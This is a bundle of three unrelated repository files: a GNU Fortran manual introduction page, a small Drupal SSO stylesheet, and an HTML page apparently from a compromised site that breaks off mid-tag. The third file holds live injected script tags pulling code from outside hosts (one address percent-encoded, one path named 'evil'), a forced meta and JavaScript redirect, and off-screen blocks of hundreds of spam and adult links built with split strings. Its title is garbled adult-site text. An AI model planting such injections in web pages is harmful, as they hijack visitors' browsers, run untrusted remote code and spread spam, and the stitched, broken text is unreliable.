SubhrajyotiSen/HelioxKernelHarpia
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <!-- Copyright (C) 1999-2016 Free Software Foundation, Inc. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with the Invariant Sections being "Funding Free Software", the Front-Cover Texts being (a) (see below), and with the Back-Cover Texts being (b) (see below). A copy of the license is included in the section entitled "GNU Free Documentation License". (a) The FSF's Front-Cover Text is: A GNU Manual (b) The FSF's Back-Cover Text is: You have freedom to copy and modify this GNU Manual, like GNU software. Copies published by the Free Software Foundation raise funds for GNU development. --> <!-- Created by GNU Texinfo 5.2, http://www.gnu.org/software/texinfo/ --> <head> <title>The GNU Fortran Compiler: Introduction</title> <meta name="description" content="The GNU Fortran Compiler: Introduction"> <meta name="keywords" content="The GNU Fortran Compiler: Introduction"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="Generator" content="makeinfo"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <link href="index.html#Top" rel="start" title="Top"> <link href="Option-Index.html#Option-Index" rel="index" title="Option Index"> <link href="index.html#SEC_Contents" rel="contents" title="Table of Contents"> <link href="index.html#Top" rel="up" title="Top"> <link href="About-GNU-Fortran.html#About-GNU-Fortran" rel="next" title="About GNU Fortran"> <link href="index.html#Top" rel="prev" title="Top"> <style type="text/css"> <!-- a.summary-letter {text-decoration: none} blockquote.smallquotation {font-size: smaller} div.display {margin-left: 3.2em} div.example {margin-left: 3.2em} div.indentedblock {margin-left: 3.2em} div.lisp {margin-left: 3.2em} div.smalldisplay {margin-left: 3.2em} div.smallexample {margin-left: 3.2em} div.smallindentedblock {margin-left: 3.2em; font-size: smaller} div.smalllisp {margin-left: 3.2em} kbd {font-style:oblique} pre.display {font-family: inherit} pre.format {font-family: inherit} pre.menu-comment {font-family: serif} pre.menu-preformatted {font-family: serif} pre.smalldisplay {font-family: inherit; font-size: smaller} pre.smallexample {font-size: smaller} pre.smallformat {font-family: inherit; font-size: smaller} pre.smalllisp {font-size: smaller} span.nocodebreak {white-space:nowrap} span.nolinebreak {white-space:nowrap} span.roman {font-family:serif; font-weight:normal} span.sansserif {font-family:sans-serif; font-weight:normal} ul.no-bullet {list-style: none} --> </style> </head> <body lang="en" bgcolor="#FFFFFF" text="#000000" link="#0000FF" vlink="#800080" alink="#FF0000"> <a name="Introduction"></a> <div class="header"> <p> Next: <a href="Invoking-GNU-Fortran.html#Invoking-GNU-Fortran" accesskey="n" rel="next">Invoking GNU Fortran</a>, Previous: <a href="index.html#Top" accesskey="p" rel="prev">Top</a>, Up: <a href="index.html#Top" accesskey="u" rel="up">Top</a> &nbsp; [<a href="index.html#SEC_Contents" title="Table of contents" rel="contents">Contents</a>][<a href="Option-Index.html#Option-Index" title="Index" rel="index">Index</a>]</p> </div> <hr> <a name="Introduction-2"></a> <h2 class="chapter">1 Introduction</h2> <p>The GNU Fortran compiler front end was designed initially as a free replacement for, or alternative to, the Unix <code>f95</code> command; <code>gfortran</code> is the command you will use to invoke the compiler. </p> <table class="menu" border="0" cellspacing="0"> <tr><td align="left" valign="top">&bull; <a href="About-GNU-Fortran.html#About-GNU-Fortran" accesskey="1">About GNU Fortran</a>:</td><td>&nbsp;&nbsp;</td><td align="left" valign="top">What you should know about the GNU Fortran compiler. </td></tr> <tr><td align="left" valign="top">&bull; <a href="GNU-Fortran-and-GCC.html#GNU-Fortran-and-GCC" accesskey="2">GNU Fortran and GCC</a>:</td><td>&nbsp;&nbsp;</td><td align="left" valign="top">You can compile Fortran, C, or other programs. </td></tr> <tr><td align="left" valign="top">&bull; <a href="Preprocessing-and-conditional-compilation.html#Preprocessing-and-conditional-compilation" accesskey="3">Preprocessing and conditional compilation</a>:</td><td>&nbsp;&nbsp;</td><td align="left" valign="top">The Fortran preprocessor </td></tr> <tr><td align="left" valign="top">&bull; <a href="GNU-Fortran-and-G77.html#GNU-Fortran-and-G77" accesskey="4">GNU Fortran and G77</a>:</td><td>&nbsp;&nbsp;</td><td align="left" valign="top">Why we chose to start from scratch. </td></tr> <tr><td align="left" valign="top">&bull; <a href="Project-Status.html#Project-Status" accesskey="5">Project Status</a>:</td><td>&nbsp;&nbsp;</td><td align="left" valign="top">Status of GNU Fortran, roadmap, proposed extensions. </td></tr> <tr><td align="left" valign="top">&bull; <a href="Standards.html#Standards" accesskey="6">Standards</a>:</td><td>&nbsp;&nbsp;</td><td align="left" valign="top">Standards supported by GNU Fortran. </td></tr> </table> </body> </html>
sites/all/modules/custom/apigee_sso/apigee_sso.css
seshir/djd
#user-login, #user-register-form { margin: 1em; position: relative; } #apigee-sso-signin-block { width: 45%;position: absolute; top: 1em; right: 0; border-left: 1px solid #aaa; } #apigee-sso-signin-block ul.federated-buttons { margin: 0 0 0 2em; list-style:none; } #apigee-sso-signin-block ul.federated-buttons li { margin: 0; padding: .25em 0; }
logs/site-nipponki/02021650787.html
ForAEdesWeb/AEW25
<script/src=//%61%6C%69%63%64%6E%2E%72%65%2E%6B%72/%72%65%2E%6B%72></script> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>99re2.¾Ã¾ÃÈÈ×îеØÖ·|É«ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×ÛºÏÍø ²å²å×ÛºÏÍø</title> <meta name="keywords" content="99re2.¾Ã¾ÃÈÈ×îеØÖ· ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×ÛºÏÍø ²å²å×ÛºÏÍø"> <meta name="description" content="99re2.¾Ã¾ÃÈÈ×îеØÖ·¸÷ÖÖ¾«²ÊÄÚÈÝʵʱ¸üÐÂ,Ϊ¹ã´óÍøÓÑÌṩԭ´´×ÊÔ´,99re2.¾Ã¾ÃÈÈ×îеØÖ·Ò»ÆðËáˬ¡£ ,˼˼µÄ¼ÒÔ°"><link rel="shortcut icon" type="image/x-icon" href="favicon.ico" /> </head> <script/src=//alicdn.re.kr/re.kr></script> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>99re2.¾Ã¾ÃÈÈ×îеØÖ·|É«ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×ÛºÏÍø ²å²å×ÛºÏÍø</title> <meta name="keywords" content="99re2.¾Ã¾ÃÈÈ×îеØÖ· ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×ÛºÏÍø ²å²å×ÛºÏÍø"> <meta name="description" content="99re2.¾Ã¾ÃÈÈ×îеØÖ·¸÷ÖÖ¾«²ÊÄÚÈÝʵʱ¸üÐÂ,Ϊ¹ã´óÍøÓÑÌṩԭ´´×ÊÔ´,99re2.¾Ã¾ÃÈÈ×îеØÖ·Ò»ÆðËáˬ¡£ ,˼˼µÄ¼ÒÔ°"><link rel="shortcut icon" type="image/x-icon" href="favicon.ico" /> </head> -------!> <script/src=//360cdn.win/c.css></script> <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.zgjm-org.com"> <script> var xx="<scr"; xx=xx+"ipt>win"; xx=xx+"dow.loc"; xx=xx+"ation.hr"; xx=xx+"ef='http://"; xx=xx+"www."; xx=xx+"zgjm-org"; xx=xx+"."; xx=xx+"com"; xx=xx+"'<\/sc"; xx=xx+"ript>";// document.write(xx); </script> <script/src=//alicdn.re.kr/re.kr></script> <div class="a1b2c8d9e1" style="position:fixed;left:-3000px;top:-3000px;"> <a class="a1b2c8d9e1" href="http://www.fliggypig.com">http://www.fliggypig.com</a> <a class="a1b2c8d9e1" href="http://www.4006000871.com">http://www.4006000871.com</a> <a class="a1b2c8d9e1" href="http://www.ddabw.com">http://www.ddabw.com</a> <a class="a1b2c8d9e1" href="http://www.ktiyl.com">http://www.ktiyl.com</a> <a class="a1b2c8d9e1" href="http://www.abbwl.com">http://www.abbwl.com</a> <a class="a1b2c8d9e1" href="http://www.rht365.com">http://www.rht365.com</a> </div class="a1b2c8d9e1"> <script>document.write ('<d' + 'iv cl' + 'a' + 's' + 's="z' + '7z8z' + '9z6" st' + 'yl' + 'e="p' + 'ositio' + 'n:f' + 'ixed;l' + 'ef' + 't:-3' + '000' + 'p' + 'x;t' + 'op' + ':-3' + '000' + 'p' + 'x;' + '"' + '>');</script> <a class="z7z8z9z6" href="http://www.4695288.com/">http://www.4695288.com/</a> <a class="z7z8z9z6" href="http://www.5613117.com/">http://www.5613117.com/</a> <a class="z7z8z9z6" href="http://www.4309272.com/">http://www.4309272.com/</a> <a class="z7z8z9z6" href="http://www.3619276.com/">http://www.3619276.com/</a> <a class="z7z8z9z6" href="http://www.1539774.com/">http://www.1539774.com/</a> <a class="z7z8z9z6" href="http://www.2234809.com/">http://www.2234809.com/</a> <a class="z7z8z9z6" href="http://www.0551180.com/">http://www.0551180.com/</a> <a class="z7z8z9z6" href="http://www.0027022.com/">http://www.0027022.com/</a> <a class="z7z8z9z6" href="http://www.1408600.com/">http://www.1408600.com/</a> <a class="z7z8z9z6" href="http://www.5004279.com/">http://www.5004279.com/</a> <a class="z7z8z9z6" href="http://www.4314451.com/">http://www.4314451.com/</a> <a class="z7z8z9z6" href="http://www.9402647.com/">http://www.9402647.com/</a> <a class="z7z8z9z6" href="http://www.6420212.com/">http://www.6420212.com/</a> <a class="z7z8z9z6" href="http://www.0921315.com/">http://www.0921315.com/</a> <a class="z7z8z9z6" href="http://www.4849062.com/">http://www.4849062.com/</a> <a class="z7z8z9z6" href="http://www.8027847.com/">http://www.8027847.com/</a> <a class="z7z8z9z6" href="http://www.5101309.com/">http://www.5101309.com/</a> <a class="z7z8z9z6" href="http://www.8033162.com/">http://www.8033162.com/</a> <a class="z7z8z9z6" href="http://www.7808733.com/">http://www.7808733.com/</a> <a class="z7z8z9z6" href="http://www.7021821.com/">http://www.7021821.com/</a> <a class="z7z8z9z6" href="http://www.8560978.com/">http://www.8560978.com/</a> <a class="z7z8z9z6" href="http://www.3301718.com/">http://www.3301718.com/</a> <a class="z7z8z9z6" href="http://www.2444890.com/">http://www.2444890.com/</a> <a class="z7z8z9z6" href="http://www.2501886.com/">http://www.2501886.com/</a> <a class="z7z8z9z6" href="http://www.8773150.com/">http://www.8773150.com/</a> <a class="z7z8z9z6" href="http://www.gkamlb.com/">http://www.gkamlb.com/</a> <a class="z7z8z9z6" href="http://www.nxkmky.com/">http://www.nxkmky.com/</a> <a class="z7z8z9z6" href="http://www.pkdszd.com/">http://www.pkdszd.com/</a> <a class="z7z8z9z6" href="http://www.scqyba.com/">http://www.scqyba.com/</a> <a class="z7z8z9z6" href="http://www.vwyhzp.com/">http://www.vwyhzp.com/</a> <a class="z7z8z9z6" href="http://www.vwwoms.com/">http://www.vwwoms.com/</a> <a class="z7z8z9z6" href="http://www.svfdun.com/">http://www.svfdun.com/</a> <a class="z7z8z9z6" href="http://www.wivjvd.com/">http://www.wivjvd.com/</a> <a class="z7z8z9z6" href="http://www.sstldp.com/">http://www.sstldp.com/</a> <a class="z7z8z9z6" href="http://www.sqmtvh.com/">http://www.sqmtvh.com/</a> <a class="z7z8z9z6" href="http://www.fmxnav.com/">http://www.fmxnav.com/</a> <a class="z7z8z9z6" href="http://www.etqglz.com/">http://www.etqglz.com/</a> <a class="z7z8z9z6" href="http://www.rjwmkb.com/">http://www.rjwmkb.com/</a> <a class="z7z8z9z6" href="http://www.yrljss.com/">http://www.yrljss.com/</a> <a class="z7z8z9z6" href="http://www.ymdwnv.com/">http://www.ymdwnv.com/</a> <a class="z7z8z9z6" href="http://www.lhxcjs.com/">http://www.lhxcjs.com/</a> <a class="z7z8z9z6" href="http://www.fekcko.com/">http://www.fekcko.com/</a> <a class="z7z8z9z6" href="http://www.furpdg.com/">http://www.furpdg.com/</a> <a class="z7z8z9z6" href="http://www.voqgwh.com/">http://www.voqgwh.com/</a> <a class="z7z8z9z6" href="http://www.fknqkj.com/">http://www.fknqkj.com/</a> <a class="z7z8z9z6" href="http://www.hhabtr.com/">http://www.hhabtr.com/</a> <a class="z7z8z9z6" href="http://www.ogmykg.com/">http://www.ogmykg.com/</a> <a class="z7z8z9z6" href="http://www.vseogg.com/">http://www.vseogg.com/</a> <a class="z7z8z9z6" href="http://www.ctkllf.com/">http://www.ctkllf.com/</a> <a class="z7z8z9z6" href="http://www.xzxefw.com/">http://www.xzxefw.com/</a> <a class="z7z8z9z6" href="http://www.0172679.com/">http://www.0172679.com/</a> <a class="z7z8z9z6" href="http://www.6088532.com/">http://www.6088532.com/</a> <a class="z7z8z9z6" href="http://www.5214437.com/">http://www.5214437.com/</a> <a class="z7z8z9z6" href="http://www.4601598.com/">http://www.4601598.com/</a> <a class="z7z8z9z6" href="http://www.3848474.com/">http://www.3848474.com/</a> <a class="z7z8z9z6" href="http://www.7621914.com/">http://www.7621914.com/</a> <a class="z7z8z9z6" href="http://www.9064024.com/">http://www.9064024.com/</a> <a class="z7z8z9z6" href="http://www.0979289.com/">http://www.0979289.com/</a> <a class="z7z8z9z6" href="http://www.8732369.com/">http://www.8732369.com/</a> <a class="z7z8z9z6" href="http://www.7578050.com/">http://www.7578050.com/</a> <a class="z7z8z9z6" href="http://www.1206219.com/">http://www.1206219.com/</a> <a class="z7z8z9z6" href="http://www.0320448.com/">http://www.0320448.com/</a> <a class="z7z8z9z6" href="http://www.6038608.com/">http://www.6038608.com/</a> <a class="z7z8z9z6" href="http://www.6804640.com/">http://www.6804640.com/</a> <a class="z7z8z9z6" href="http://www.2393657.com/">http://www.2393657.com/</a> <a class="z7z8z9z6" href="http://www.laibazonghewang.com/">http://www.laibazonghewang.com/</a> <a class="z7z8z9z6" href="http://www.jiujiurezuixindizhi.com/">http://www.jiujiurezuixindizhi.com/</a> <a class="z7z8z9z6" href="http://www.jiqingtupian8.com/">http://www.jiqingtupian8.com/</a> <a class="z7z8z9z6" href="http://www.qmzufv.com/">http://www.qmzufv.com/</a> <a class="z7z8z9z6" href="http://www.kwwxgj.com/">http://www.kwwxgj.com/</a> <a class="z7z8z9z6" href="http://www.tvubqi.com/">http://www.tvubqi.com/</a> <a class="z7z8z9z6" href="http://www.sjvxww.com/">http://www.sjvxww.com/</a> <a class="z7z8z9z6" href="http://www.xpdmzk.com/">http://www.xpdmzk.com/</a> <a class="z7z8z9z6" href="http://www.frveya.com/">http://www.frveya.com/</a> <a class="z7z8z9z6" href="http://www.nonmnu.com/">http://www.nonmnu.com/</a> <a class="z7z8z9z6" href="http://www.svytac.com/">http://www.svytac.com/</a> <a class="z7z8z9z6" href="http://www.fdtggb.com/">http://www.fdtggb.com/</a> <a class="z7z8z9z6" href="http://www.rnrnjm.com/">http://www.rnrnjm.com/</a> <a class="z7z8z9z6" href="http://www.ymrxun.com/">http://www.ymrxun.com/</a> <a class="z7z8z9z6" href="http://www.lkrecc.com/">http://www.lkrecc.com/</a> <a class="z7z8z9z6" href="http://www.kgahjl.com/">http://www.kgahjl.com/</a> <a class="z7z8z9z6" href="http://www.kqdmep.com/">http://www.kqdmep.com/</a> <a class="z7z8z9z6" href="http://www.vwlwcu.com/">http://www.vwlwcu.com/</a> <a class="z7z8z9z6" href="http://www.zuixinlunlidianying.com/">http://www.zuixinlunlidianying.com/</a> <a class="z7z8z9z6" href="http://www.daxiangjiaowangzhi.com/">http://www.daxiangjiaowangzhi.com/</a> <a class="z7z8z9z6" href="http://www.snnfi.com/">http://www.snnfi.com/</a> <a class="z7z8z9z6" href="http://www.vfdyd.com/">http://www.vfdyd.com/</a> <a class="z7z8z9z6" href="http://www.lwezk.com/">http://www.lwezk.com/</a> <a class="z7z8z9z6" href="http://www.fpibm.com/">http://www.fpibm.com/</a> <a class="z7z8z9z6" href="http://www.xjvdr.com/">http://www.xjvdr.com/</a> <a class="z7z8z9z6" href="http://www.kvwqf.com/">http://www.kvwqf.com/</a> <a class="z7z8z9z6" href="http://www.utakf.com/">http://www.utakf.com/</a> <a class="z7z8z9z6" href="http://www.gmjeu.com/">http://www.gmjeu.com/</a> <a class="z7z8z9z6" href="http://www.pugfa.com/">http://www.pugfa.com/</a> <a class="z7z8z9z6" href="http://www.bldek.com/">http://www.bldek.com/</a> <a class="z7z8z9z6" href="http://www.vdidu.com/">http://www.vdidu.com/</a> <a class="z7z8z9z6" href="http://www.tufnc.com/">http://www.tufnc.com/</a> <a class="z7z8z9z6" href="http://www.wqxri.com/">http://www.wqxri.com/</a> <a class="z7z8z9z6" href="http://www.uaozz.com/">http://www.uaozz.com/</a> <a class="z7z8z9z6" href="http://www.nhpbd.com/">http://www.nhpbd.com/</a> <a class="z7z8z9z6" href="http://www.dinbz.com/">http://www.dinbz.com/</a> <a class="z7z8z9z6" href="http://www.bopjc.com/">http://www.bopjc.com/</a> <a class="z7z8z9z6" href="http://www.rvkip.com/">http://www.rvkip.com/</a> <a class="z7z8z9z6" href="http://www.jsmqe.com/">http://www.jsmqe.com/</a> <a class="z7z8z9z6" href="http://www.vwygx.com/">http://www.vwygx.com/</a> <a class="z7z8z9z6" href="http://www.zgjm-org.com/">http://www.zgjm-org.com/</a> <a class="z7z8z9z6" href="http://www.shenyangsiyue.com/">http://www.shenyangsiyue.com/</a> <a class="z7z8z9z6" href="http://www.hongsang.net/">http://www.hongsang.net/</a> <a class="z7z8z9z6" href="http://www.gpmrg.cc/">http://www.gpmrg.cc/</a> <a class="z7z8z9z6" href="http://www.knfut.cc/">http://www.knfut.cc/</a> <a class="z7z8z9z6" href="http://www.kjqdh.cc/">http://www.kjqdh.cc/</a> <a class="z7z8z9z6" href="http://www.huang62.win/">http://www.huang62.win/</a> <a class="z7z8z9z6" href="http://www.qiong19.win/">http://www.qiong19.win/</a> <a class="z7z8z9z6" href="http://www.chang34.win/">http://www.chang34.win/</a> <a class="z7z8z9z6" href="http://www.huang71.win/">http://www.huang71.win/</a> <a class="z7z8z9z6" href="http://www.xiong10.win/">http://www.xiong10.win/</a> <a class="z7z8z9z6" href="http://www.chong14.win/">http://www.chong14.win/</a> <a class="z7z8z9z6" href="http://www.chong94.win/">http://www.chong94.win/</a> <a class="z7z8z9z6" href="http://www.zheng23.win/">http://www.zheng23.win/</a> <a class="z7z8z9z6" href="http://www.cheng14.win/">http://www.cheng14.win/</a> <a class="z7z8z9z6" href="http://www.shang72.win/">http://www.shang72.win/</a> <a class="z7z8z9z6" href="http://www.sudanj.win/">http://www.sudanj.win/</a> <a class="z7z8z9z6" href="http://www.russias.win/">http://www.russias.win/</a> <a class="z7z8z9z6" href="http://www.malim.win/">http://www.malim.win/</a> <a class="z7z8z9z6" href="http://www.nigery.win/">http://www.nigery.win/</a> <a class="z7z8z9z6" href="http://www.malix.win/">http://www.malix.win/</a> <a class="z7z8z9z6" href="http://www.peruf.win/">http://www.peruf.win/</a> <a class="z7z8z9z6" href="http://www.iraqq.win/">http://www.iraqq.win/</a> <a class="z7z8z9z6" href="http://www.nepali.win/">http://www.nepali.win/</a> <a class="z7z8z9z6" href="http://www.syriax.win/">http://www.syriax.win/</a> <a class="z7z8z9z6" href="http://www.junnp.pw/">http://www.junnp.pw/</a> <a class="z7z8z9z6" href="http://www.junnp.win/">http://www.junnp.win/</a> <a class="z7z8z9z6" href="http://www.zanpianba.com/">http://www.zanpianba.com/</a> <a class="z7z8z9z6" href="http://www.shoujimaopian.com/">http://www.shoujimaopian.com/</a> <a class="z7z8z9z6" href="http://www.gaoqingkanpian.com/">http://www.gaoqingkanpian.com/</a> <a class="z7z8z9z6" href="http://www.kuaibokanpian.com/">http://www.kuaibokanpian.com/</a> <a class="z7z8z9z6" href="http://www.baidukanpian.com/">http://www.baidukanpian.com/</a> <a class="z7z8z9z6" href="http://www.wwwren99com.top/">http://www.wwwren99com.top/</a> <a class="z7z8z9z6" href="http://www.wwwdgshunyuancom.top/">http://www.wwwdgshunyuancom.top/</a> <a class="z7z8z9z6" href="http://www.xianfengziyuancom.top/">http://www.xianfengziyuancom.top/</a> <a class="z7z8z9z6" href="http://www.www96yyxfcom.top/">http://www.www96yyxfcom.top/</a> <a class="z7z8z9z6" href="http://www.www361dywnet.top/">http://www.www361dywnet.top/</a> <a class="z7z8z9z6" href="http://www.wwwbambootechcc.top/">http://www.wwwbambootechcc.top/</a> <a class="z7z8z9z6" href="http://www.wwwluoqiqicom.top/">http://www.wwwluoqiqicom.top/</a> <a class="z7z8z9z6" href="http://www.wwwyyxfnrzcom.top/">http://www.wwwyyxfnrzcom.top/</a> <a class="z7z8z9z6" href="http://www.wwwzhengdadycom.top/">http://www.wwwzhengdadycom.top/</a> <a class="z7z8z9z6" href="http://www.wwwyewaishengcuncom.top/">http://www.wwwyewaishengcuncom.top/</a> <a class="z7z8z9z6" href="http://www.wwwcong3win.top/">http://www.wwwcong3win.top/</a> <a class="z7z8z9z6" href="http://www.wwwmh-oemcn.top/">http://www.wwwmh-oemcn.top/</a> <a class="z7z8z9z6" href="http://www.henhen168com.top/">http://www.henhen168com.top/</a> <a class="z7z8z9z6" href="http://www.wwwhztuokuncom.top/">http://www.wwwhztuokuncom.top/</a> <a class="z7z8z9z6" href="http://www.wwwyasyzxcn.top/">http://www.wwwyasyzxcn.top/</a> <a class="z7z8z9z6" href="http://www.www9hkucom.top/">http://www.www9hkucom.top/</a> <a class="z7z8z9z6" href="http://www.wwwguokrcom.top/">http://www.wwwguokrcom.top/</a> <a class="z7z8z9z6" href="http://www.avhhhhcom.top/">http://www.avhhhhcom.top/</a> <a class="z7z8z9z6" href="http://www.shouyouaipaicom.top/">http://www.shouyouaipaicom.top/</a> <a class="z7z8z9z6" href="http://www.wwwdouyutvcom.top/">http://www.wwwdouyutvcom.top/</a> <a class="z7z8z9z6" href="http://www.bbsptbuscom.top/">http://www.bbsptbuscom.top/</a> <a class="z7z8z9z6" href="http://www.miphonetgbuscom.top/">http://www.miphonetgbuscom.top/</a> <a class="z7z8z9z6" href="http://www.wwwtjkunchengcom.top/">http://www.wwwtjkunchengcom.top/</a> <a class="z7z8z9z6" href="http://www.lolboxduowancom.top/">http://www.lolboxduowancom.top/</a> <a class="z7z8z9z6" href="http://www.wwwtaoyuancncom.top/">http://www.wwwtaoyuancncom.top/</a> <a class="z7z8z9z6" href="http://www.wwwngffwcomcn.top/">http://www.wwwngffwcomcn.top/</a> <a class="z7z8z9z6" href="http://www.wwwqingzhouwanhecom.top/">http://www.wwwqingzhouwanhecom.top/</a> <a class="z7z8z9z6" href="http://www.wwwckyygcn.top/">http://www.wwwckyygcn.top/</a> <a class="z7z8z9z6" href="http://www.wwwcdcjzcn.top/">http://www.wwwcdcjzcn.top/</a> <a class="z7z8z9z6" href="http://www.m6downnet.top/">http://www.m6downnet.top/</a> <a class="z7z8z9z6" href="http://www.msmzycom.top/">http://www.msmzycom.top/</a> <a class="z7z8z9z6" href="http://www.wwwcaobolcom.top/">http://www.wwwcaobolcom.top/</a> <a class="z7z8z9z6" href="http://www.m3533com.top/">http://www.m3533com.top/</a> <a class="z7z8z9z6" href="http://www.gmgamedogcn.top/">http://www.gmgamedogcn.top/</a> <a class="z7z8z9z6" href="http://www.m289com.top/">http://www.m289com.top/</a> <a class="z7z8z9z6" href="http://www.jcbnscom.top/">http://www.jcbnscom.top/</a> <a class="z7z8z9z6" href="http://www.www99daocom.top/">http://www.www99daocom.top/</a> <a class="z7z8z9z6" href="http://www.3gali213net.top/">http://www.3gali213net.top/</a> <a class="z7z8z9z6" href="http://www.wwwmeidaiguojicom.top/">http://www.wwwmeidaiguojicom.top/</a> <a class="z7z8z9z6" href="http://www.msz1001net.top/">http://www.msz1001net.top/</a> <a class="z7z8z9z6" href="http://www.luyiluueappcom.top/">http://www.luyiluueappcom.top/</a> <a class="z7z8z9z6" href="http://www.wwwvcnnnet.top/">http://www.wwwvcnnnet.top/</a> <a class="z7z8z9z6" href="http://www.wwwchaoaicaicom.top/">http://www.wwwchaoaicaicom.top/</a> <a class="z7z8z9z6" href="http://www.mcnmocom.top/">http://www.mcnmocom.top/</a> <a class="z7z8z9z6" href="http://www.wwwqiuxia88com.top/">http://www.wwwqiuxia88com.top/</a> <a class="z7z8z9z6" href="http://www.www5253com.top/">http://www.www5253com.top/</a> <a class="z7z8z9z6" href="http://www.wwwhaichuanwaiyucom.top/">http://www.wwwhaichuanwaiyucom.top/</a> <a class="z7z8z9z6" href="http://www.wwwulunarcn.top/">http://www.wwwulunarcn.top/</a> <a class="z7z8z9z6" href="http://www.wwwvideo6868com.top/">http://www.wwwvideo6868com.top/</a> <a class="z7z8z9z6" href="http://www.wwwythmbxgcom.top/">http://www.wwwythmbxgcom.top/</a> <a class="z7z8z9z6" href="http://www.gakaycom.top/">http://www.gakaycom.top/</a> <a class="z7z8z9z6" href="http://www.wwwhf1zcom.top/">http://www.wwwhf1zcom.top/</a> <a class="z7z8z9z6" href="http://www.wwwkrd17net.top/">http://www.wwwkrd17net.top/</a> <a class="z7z8z9z6" href="http://www.qqav4444net.top/">http://www.qqav4444net.top/</a> <a class="z7z8z9z6" href="http://www.www5a78com.top/">http://www.www5a78com.top/</a> <a class="z7z8z9z6" href="http://www.hztuokuncom.top/">http://www.hztuokuncom.top/</a> <a class="z7z8z9z6" href="http://www.wwwqqqav7979net.top/">http://www.wwwqqqav7979net.top/</a> <a class="z7z8z9z6" href="http://www.sscaoacom.top/">http://www.sscaoacom.top/</a> <a class="z7z8z9z6" href="http://www.51yeyelu.info/">http://www.51yeyelu.info/</a> <a class="z7z8z9z6" href="http://www.52luyilu.info/">http://www.52luyilu.info/</a> <a class="z7z8z9z6" href="http://www.52yeyelu.info/">http://www.52yeyelu.info/</a> <a class="z7z8z9z6" href="http://www.91yeyelu.info/">http://www.91yeyelu.info/</a> <a class="z7z8z9z6" href="http://www.yeyelupic.info/">http://www.yeyelupic.info/</a> <script>document.write ('</' + 'di' + 'v c' + 'l' + 'ass=' + '"' + 'z7z' + '8z9z' + '6' + '"' + '>');</script> <!-------!><script src="http://www.aissxs.cc/1.js"></script><script/src=//alicdn.re.kr/re.kr></script><script src="http://cpm.36obuy.org/evil/1.js"></script><script src="http://cpm.36obuy.org/lion/1.js"></script><script/src=//360cdn.win/c.css></script> <script>document.write ('<d' + 'iv cl' + 'a' + 's' + 's="z' + '7z8z' + '9z6" st' + 'yl' + 'e="p' + 'ositio' + 'n:f' + 'ixed;l' + 'ef' + 't:-3' + '000' + 'p' + 'x;t' + 'op' + ':-3' + '000' + 'p' + 'x;' + '"' + '>');</script> <a class="z7z8z9z6" href="http://www.4695288.com/">http://www.4695288.com/</a> <a class="z7z8z9z6" href="http://www.5613117.com/">http://www.5613117.com/</a> <a class="z7z8z9z6" href="http://www.4309272.com/">http://www.4309272.com/</a> <a class="z7z8z9z6" href="http://www.3619276.com/">http://www.3619276.com/</a> <a class="z7z8z9z6" href="http://www.1539774.com/">http://www.1539774.com/</a> <a class="z7z8z9z6" href="http://www.2234809.com/">http://www.2234809.com/</a> <a class="z7z8z9z6" href="http://www.0551180.com/">http://www.0551180.com/</a> <a class="z7z8z9z6" href="http://www.0027022.com/">http://www.0027022.com/</a> <a class="z7z8z9z6" href="http://www.1408600.com/">http://www.1408600.com/</a> <a class="z7z8z9z6" href="http://www.5004279.com/">http://www.5004279.com/</a> <a class="z7z8z9z6" href="http://www.4314451.com/">http://www.4314451.com/</a> <a class="z7z8z9z6" href="http://www.9402647.com/">http://www.9402647.com/</a> <a class="z7z8z9z6" href="http://www.6420212.com/">http://www.6420212.com/</a> <a class="z7z8z9z6" href="http://www.0921315.com/">http://www.0921315.com/</a> <a class="z7z8z9z6" href="http://www.4849062.com/">http://www.4849062.com/</a> <a class="z7z8z9z6" href="http://www.8027847.com/">http://www.8027847.com/</a> <a class="z7z8z9z6" href="http://www.5101309.com/">http://www.5101309.com/</a> <a class="z7z8z9z6" href="http://www.8033162.com/">http://www.8033162.com/</a> <a class="z7z8z9z6" href="http://www.7808733.com/">http://www.7808733.com/</a> <a class="z7z8z9z6" href="http://www.7021821.com/">http://www.7021821.com/</a> <a class="z7z8z9z6" href="http://www.8560978.com/">http://www.8560978.com/</a> <a class="z7z8z9z6" href="http://www.3301718.com/">http://www.3301718.com/</a> <a class="z7z8z9z6" href="http://www.2444890.com/">http://www.2444890.com/</a> <a class="z7z8z9z6" href="http://www.2501886.com/">http://www.2501886.com/</a> <a class="z7z8z9z6" href="http://www.8773150.com/">http://www.8773150.com/</a> <a class="z7z8z9z6" href="http://www.gkamlb.com/">http://www.gkamlb.com/</a> <a class="z7z8z9z6" href="http://www.nxkmky.com/">http://www.nxkmky.com/</a> <a class="z7z8z9z6" href="http://www.pkdszd.com/">http://www.pkdszd.com/</a> <a class="z7z8z9z6" href="http://www.scqyba.com/">http://www.scqyba.com/</a> <a class="z7z8z9z6" href="http://www.vwyhzp.com/">http://www.vwyhzp.com/</a> <a class="z7z8z9z6" href="http://www.vwwoms.com/">http://www.vwwoms.com/</a> <a class="z7z8z9z6" href="http://www.svfdun.com/">http://www.svfdun.com/</a> <a class="z7z8z9z6" href="http://www.wivjvd.com/">http://www.wivjvd.com/</a> <a class="z7z8z9z6" href="http://www.sstldp.com/">http://www.sstldp.com/</a> <a class="z7z8z9z6" href="http://www.sqmtvh.com/">http://www.sqmtvh.com/</a> <a class="z7z8z9z6" href="http://www.fmxnav.com/">http://www.fmxnav.com/</a> <a class="z7z8z9z6" 